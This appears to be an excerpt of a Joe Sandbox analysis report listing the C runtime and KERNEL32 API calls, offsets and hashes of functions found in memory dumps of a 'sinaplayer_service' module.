                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency@@$??0scoped_lock@critical_section@??2@?unlock@critical_section@AllocExceptionH_prolog3HeapThrowV12@@mallocstd::exception::exception
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3930479332-0
                                                                                                                                                                                                    • Opcode ID: 50b6d77657ea64918eede118608c7e906edf80b765622978e2658019f50b9b68
                                                                                                                                                                                                    • Instruction ID: a985ccdc9151c024a542899bd957d01c517edf2d636896cf4034676b4e134f61
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 50b6d77657ea64918eede118608c7e906edf80b765622978e2658019f50b9b68
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 683198B59087069FE724DF64D480B9EBBF4BF40354F50892EE9959B240DB71AA44CB81
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 6D0F88F2
                                                                                                                                                                                                    • malloc.MSVCR120(?,00000020,6D0F921D,?,?,?), ref: 6D0F895D
                                                                                                                                                                                                      • Part of subcall function 6D08ED30: HeapAlloc.KERNEL32(005A0000,00000000,6D0FC0AD,00000000,?,00000000,?,6D09223C,6D0FC0AD,6D163B90,6D163B90,?,?,6D0FC0AD,?,00000000), ref: 6D08ED5D
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(00000000,00000001,00000020,6D0F921D,?,?,?), ref: 6D0F8989
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D0AC7FC,00000000,00000001,00000020,6D0F921D,?,?,?), ref: 6D0F899E
                                                                                                                                                                                                    • ?wait_for_multiple@event@Concurrency@@SAIPAPAV12@I_NI@Z.MSVCR120(00000000,00000002,00000001,000000FF,00000020,6D0F921D,?,?,?), ref: 6D0F89CE
                                                                                                                                                                                                    • _freea_s.MSVCR120(00000000,00000000,00000002,00000001,000000FF,00000020,6D0F921D,?,?,?), ref: 6D0F89D4
                                                                                                                                                                                                    • ?wait@event@Concurrency@@QAEII@Z.MSVCR120(000000FF,00000020,6D0F921D,?,?,?), ref: 6D0F89E3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency@@$?wait@event@?wait_for_multiple@event@AllocExceptionH_prolog3_HeapThrowV12@_freea_smallocstd::exception::exception
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 559173246-0
                                                                                                                                                                                                    • Opcode ID: d25726fc4a06f6caad06dbd0cb79798e9818e34caa745c3a58295f9eb49ffbc0
                                                                                                                                                                                                    • Instruction ID: 22493d821a16a528735d9d79ad4fcaae4d8f9660a5836c5b6ae88c27ab179995
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d25726fc4a06f6caad06dbd0cb79798e9818e34caa745c3a58295f9eb49ffbc0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D631D1F1D082168BFB10DF95C880BEEBBF4BF05710F694119DA45AB245D7708A42CB92
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,?,?,6D0A0A40,00000010), ref: 6D0A0951
                                                                                                                                                                                                    • _fileno.MSVCR120(?,?,?,?,?,?,?,6D0A0A40,00000010), ref: 6D0A099A
                                                                                                                                                                                                    • strlen.MSVCR120(?,?,?,?,?,?,?,6D0A0A40,00000010), ref: 6D0A09ED
                                                                                                                                                                                                    • _lock_file.MSVCR120(?,?,?,?,?,?,?,?,6D0A0A40,00000010), ref: 6D0A09F8
                                                                                                                                                                                                    • _fwrite_nolock.MSVCR120(?,00000001,00000000,?,?,?,?,?,?,?,?,6D0A0A40,00000010), ref: 6D0A0A12
                                                                                                                                                                                                    • __ftbuf.LIBCMT ref: 6D0A0A1C
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,?,?,?,6D0A0A40,00000010), ref: 6D0D4F91
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __ftbuf_errno_fileno_fwrite_nolock_invalid_parameter_noinfo_lock_filestrlen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2817190391-0
                                                                                                                                                                                                    • Opcode ID: 88702f96ba2c63aad4ec932e20dcf58617016dfadc3c33144055913b9103e895
                                                                                                                                                                                                    • Instruction ID: a10284a4d413df561f4634c04b3613524bdeb96f6efffe3b7c9b3783737772a9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 88702f96ba2c63aad4ec932e20dcf58617016dfadc3c33144055913b9103e895
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6021367291C20E6BFB015FB68C4073E36E1AB86378F198328E5359F1DADBF8D9419601
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __fltout2.LIBCMT ref: 6D0B0917
                                                                                                                                                                                                      • Part of subcall function 6D09B131: $I10_OUTPUT.MSVCR120(?,?,?,?,?,?,6D1092B2,?,?,?,?,00000016,?,0000015D,?), ref: 6D09B170
                                                                                                                                                                                                      • Part of subcall function 6D09B131: strcpy_s.MSVCR120(6D1092B2,?,?,?,?,?,?,?,?,6D1092B2,?,?,?,?,00000016), ref: 6D09B190
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,?,?,?,?,6D1094D6,00000000,?,6D1094D6,?,?,?,?), ref: 6D0E1087
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,?,?,?,?,?,6D1094D6,00000000,?,6D1094D6,?,?,?,?), ref: 6D0E108E
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,?,?,?,?,?,6D1094D6,00000000,?,6D1094D6,?,?,?), ref: 6D0E109A
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,?,?,?,?,?,?,6D1094D6,00000000,?,6D1094D6,?,?,?), ref: 6D0E10A1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$I10___fltout2strcpy_s
                                                                                                                                                                                                    • String ID: -
                                                                                                                                                                                                    • API String ID: 2050506888-2547889144
                                                                                                                                                                                                    • Opcode ID: e7dd649bc10b9dcce74dae2acfbca99c275779e6dd036a93948f2abc0156a9d2
                                                                                                                                                                                                    • Instruction ID: 1cc5b843a5c5c1f3518fb80007933299f5b0a370946e55b104eeadfd63ad11ab
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7dd649bc10b9dcce74dae2acfbca99c275779e6dd036a93948f2abc0156a9d2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F821A772A0820A9FEB05DF79CD80FAFB7B8EF0A254F058169E615A7250F771DC448B61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __doserrno.MSVCR120(6D0B2EB0,00000010), ref: 6D0B2E02
                                                                                                                                                                                                    • __doserrno.MSVCR120(6D0B2EB0,00000010), ref: 6D0DF011
                                                                                                                                                                                                    • _errno.MSVCR120(6D0B2EB0,00000010), ref: 6D0DF018
                                                                                                                                                                                                    • _errno.MSVCR120(6D0B2EB0,00000010), ref: 6D0DF05D
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D0B2EB0,00000010), ref: 6D0DF068
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __doserrno_errno$_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2315031519-0
                                                                                                                                                                                                    • Opcode ID: 3d2cd5dff257d247794e35ad327914d4f5807284a7270f65af17be39aaf0f95f
                                                                                                                                                                                                    • Instruction ID: 78d37ec14e142165479c5398555217d5b5971d214a66ccf71fdeb6f135f8d27d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d2cd5dff257d247794e35ad327914d4f5807284a7270f65af17be39aaf0f95f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED215B3190C3125AF7265F78C88072E7AB4BF47328F928219D6709F2D0CB76894197A1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D5CF5
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0D5D00
                                                                                                                                                                                                    • _errno.MSVCR120(?), ref: 6D0D5D0D
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?), ref: 6D0D5D18
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID: B
                                                                                                                                                                                                    • API String ID: 2959964966-1255198513
                                                                                                                                                                                                    • Opcode ID: 41eae63a9d4462465d4519238392044cd4c182868a480cdf31359df9f0fb5fa0
                                                                                                                                                                                                    • Instruction ID: 8b9191a6da874d2d4f92bf80cd16178475a019bd16baacec6751bc4a5ee673e5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41eae63a9d4462465d4519238392044cd4c182868a480cdf31359df9f0fb5fa0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4821B335D0420A9EFB118FB8C8047AF7BB4EF49324F114216E934AB2C0D776C4109FA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32(00000000,?,?,6D0ACAB6), ref: 6D0ACAC0
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,6D0ACAB6), ref: 6D0ACAF4
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000000,?,?,?,?,6D0ACAB6), ref: 6D0ACB02
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,00000000,00000000,?,?,?,?,6D0ACAB6), ref: 6D0ACB1A
                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,6D0ACAB6), ref: 6D0ACB29
                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,6D0ACAB6), ref: 6D0ACB39
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EnvironmentStrings$ByteCharFreeMultiWide$_malloc_crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3279498665-0
                                                                                                                                                                                                    • Opcode ID: dac9b63965c8a3a3c11b5e2e2c346cc4ad763e5edabb738fc3ccdeab2cbd9301
                                                                                                                                                                                                    • Instruction ID: 32c1bbda7d81e418c4e45181c57f407002ce62ebca4f636264f9769ea5bbe678
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dac9b63965c8a3a3c11b5e2e2c346cc4ad763e5edabb738fc3ccdeab2cbd9301
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F11C86A914292BBFB115AF55C48E7F7AFCEA52254316442BFC09D3242EB61CC0081B5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,6D163B90,00000104,00000000,?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 6D0FC05E
                                                                                                                                                                                                    • _parse_cmdline.LIBCMT ref: 6D0FC085
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D0FC0A8
                                                                                                                                                                                                    • _parse_cmdline.LIBCMT ref: 6D0FC0C2
                                                                                                                                                                                                    • __cwild.LIBCMT ref: 6D0FC0D9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _parse_cmdline$FileModuleName__cwild_malloc_crt
                                                                                                                                                                                                    • String ID: 0'Z
                                                                                                                                                                                                    • API String ID: 953782237-2320578061
                                                                                                                                                                                                    • Opcode ID: e9720279e2bcb3a0f2094256a63af30a8fee3222283eb83a53a870a1c3dce0bb
                                                                                                                                                                                                    • Instruction ID: cd385b7f9827e85b8cd668012a274e3b3612aa851c94f0d9df71ea6cbeb021bc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e9720279e2bcb3a0f2094256a63af30a8fee3222283eb83a53a870a1c3dce0bb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0411B6B1844149BBEB10CBE8D8C1EAF77BCEA462147604756EA21D3140D7719A0787A5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __unDName.MSVCR120(00000000,?,00000000,?,?,00002800,6D094110,0000000C), ref: 6D0A3979
                                                                                                                                                                                                      • Part of subcall function 6D0A38B1: _lock.MSVCR120(00000005,6D0A3948,00000064,6D0A397E,00000000,?,00000000,?,?,00002800,6D094110,0000000C), ref: 6D0A38D7
                                                                                                                                                                                                    • strlen.MSVCR120(00000000), ref: 6D0A398C
                                                                                                                                                                                                    • _lock.MSVCR120(0000000E), ref: 6D0A39A9
                                                                                                                                                                                                    • malloc.MSVCR120(00000008), ref: 6D0A39BB
                                                                                                                                                                                                    • malloc.MSVCR120(-00000004), ref: 6D0A39CC
                                                                                                                                                                                                    • strcpy_s.MSVCR120(00000000,-00000004,00000000), ref: 6D0A39E0
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6D0A3A05
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _lockmalloc$Name__unfreestrcpy_sstrlen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3329257654-0
                                                                                                                                                                                                    • Opcode ID: 0c635f27a3814d14624eed1c2bc9c4dc3cc03fb63c6868892f20899d3367e5a6
                                                                                                                                                                                                    • Instruction ID: addca0690d783d7665dae2476e75f3695a13bd1294f99f0f2d8b0398ec877456
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c635f27a3814d14624eed1c2bc9c4dc3cc03fb63c6868892f20899d3367e5a6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E11E0B1D08713BBF7019BB4DC41B6AB7E8BF1A314F01855AE928DB282EB31D940C694
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • HeapAlloc.KERNEL32(005A0000,00000000,6D0FC0AD,00000000,?,00000000,?,6D09223C,6D0FC0AD,6D163B90,6D163B90,?,?,6D0FC0AD,?,00000000), ref: 6D08ED5D
                                                                                                                                                                                                    • __NMSG_WRITE.LIBCMT ref: 6D0DDA8F
                                                                                                                                                                                                    • _callnewh.MSVCR120(6D0FC0AD,00000000,?,00000000,?,6D09223C,6D0FC0AD,6D163B90,6D163B90,?,?,6D0FC0AD,?,00000000,00000000,00000000), ref: 6D0DDAB3
                                                                                                                                                                                                    • _callnewh.MSVCR120(6D0FC0AD,00000000,?,6D09223C,6D0FC0AD,6D163B90,6D163B90,?,?,6D0FC0AD,?,00000000,00000000,00000000,00000000,00000000), ref: 6D0DDAD6
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?,6D09223C,6D0FC0AD,6D163B90,6D163B90,?,?,6D0FC0AD,?,00000000,00000000,00000000,00000000,00000000), ref: 6D0DDADC
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _callnewh$AllocHeap_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3215684309-0
                                                                                                                                                                                                    • Opcode ID: d282db2b2c91a082747512f1744d78d6e033786cbeeadcf0612bb918670a9dac
                                                                                                                                                                                                    • Instruction ID: f4a4f34ffdaea24b1ad345de185870392c212dd85ce72fca9a70806d196d57b4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d282db2b2c91a082747512f1744d78d6e033786cbeeadcf0612bb918670a9dac
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A001D63935C316ABFB011B2C9800F6A27ACDB82668F16412AEA10CB1D0EF75D8009A71
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __doserrno.MSVCR120(6D094F30,00000010), ref: 6D094E98
                                                                                                                                                                                                    • __doserrno.MSVCR120(6D094F30,00000010), ref: 6D0DE1BB
                                                                                                                                                                                                    • _errno.MSVCR120(6D094F30,00000010), ref: 6D0DE1C2
                                                                                                                                                                                                    • _errno.MSVCR120(6D094F30,00000010), ref: 6D0DE1F9
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D094F30,00000010), ref: 6D0DE204
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __doserrno_errno$_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2315031519-0
                                                                                                                                                                                                    • Opcode ID: 004982445fcdf572f574071e1886bbc019c59fde4253a5c1ab286cc67d3cc551
                                                                                                                                                                                                    • Instruction ID: a2aa478fc3fbe5bccba0cd74cf384d37ef0422cfe3ce016d60c11b5a9cc6818f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 004982445fcdf572f574071e1886bbc019c59fde4253a5c1ab286cc67d3cc551
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2711E376919711AEF7025F68C88036DB6A0BF4A328F531345D5B49F2F1CBB8C840AB95
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo$_wmemsetmemcpy
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1830569105-0
                                                                                                                                                                                                    • Opcode ID: d466e86d94f8c8e3f76ff28f24f5c7603f8faac23cd4054913c42b66cff7b720
                                                                                                                                                                                                    • Instruction ID: 5acee1a4270a26189e02dcf1116dd50d039a731869b7fc5face44ccb2a293ccb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d466e86d94f8c8e3f76ff28f24f5c7603f8faac23cd4054913c42b66cff7b720
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D901D871798719ABF722AE689C00F9F376C9F45B24F41841BFA04AF240D7B1D8509BE6
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wcslen.MSVCR120(00000000,?,00000000,?,6D0A96C4,?,?,?,?,6D0A96E8,0000000C), ref: 6D0A9571
                                                                                                                                                                                                    • wcslen.MSVCR120(00000000,?,00000000,?,6D0A96C4,?,?,?,?,6D0A96E8,0000000C), ref: 6D0A9580
                                                                                                                                                                                                    • _wcsnicoll.MSVCR120(00000000,00000000,00000000,?,00000000,?,6D0A96C4,?,?,?,?,6D0A96E8,0000000C), ref: 6D0A959D
                                                                                                                                                                                                    • ___crtGetEnvironmentStringsW.LIBCMT ref: 6D0A9D9E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wcslen$EnvironmentStrings___crt_wcsnicoll
                                                                                                                                                                                                    • String ID: *\
                                                                                                                                                                                                    • API String ID: 2626493194-3401207301
                                                                                                                                                                                                    • Opcode ID: 745abadbf62e84239558564cd3e20a5faf12661227a2ed881c20564f6e3b8a42
                                                                                                                                                                                                    • Instruction ID: e00cd9744cef41538d027dac3588cca3d72615d4788743db3918d9b6ba2c19da
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 745abadbf62e84239558564cd3e20a5faf12661227a2ed881c20564f6e3b8a42
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C001C472B082119BFF155EF9F441B5937E8AE01754B9D442AEA188B212EB73D98087D0
APIs
• GetNumaHighestNodeNumber.KERNEL32(?,?,6D0A5034,E18D5491,?,00000180,?), ref: 6D0A4509
• GetLastError.KERNEL32(?,6D15CF40,?,?,?,?,?,?,6D0A6C5D), ref: 6D0D20C9
• Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D20DF
• _CxxThrowException.MSVCR120(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D20ED
• ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D20F3
Strings
Memory Dump Source
• Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
• Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
Similarity
• API ID: Version@$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorConcurrency@@ErrorExceptionHighestLastManager@1@NodeNumaNumberResourceThrow
